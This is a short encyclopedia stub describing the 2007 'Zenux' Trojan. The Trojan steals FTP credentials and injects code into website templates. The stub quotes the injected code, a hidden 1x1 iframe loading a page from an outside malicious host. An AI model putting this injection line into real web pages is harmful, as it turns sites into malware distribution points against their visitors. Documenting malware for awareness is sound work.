The virus functioned as follows: after infecting the user's PC, the Trojan steals all FTP access codes on the computer. After this it accesses the respective FTP accounts, and inserts a small piece of code into the template of the sites, located on the FTP account. After the page has been infected, it acts as a host for the virus, while the latter becomes a small square 1×1 pixels in the lower left corner of the page.
The code inserted by the virus is the following:
<!-- ~ --><iframe src="http://zenux.info/info/index.php" width="1" height="1"><!-- ~ -->
First reports about the virus came on June 11, 2007.
- TROJAN ALERT! "Zenux" Steals FTP Access Codes, InfoNIAC.com, June 11, 2007.
|This malware-related article is a stub. You can help Wikipedia by expanding it.|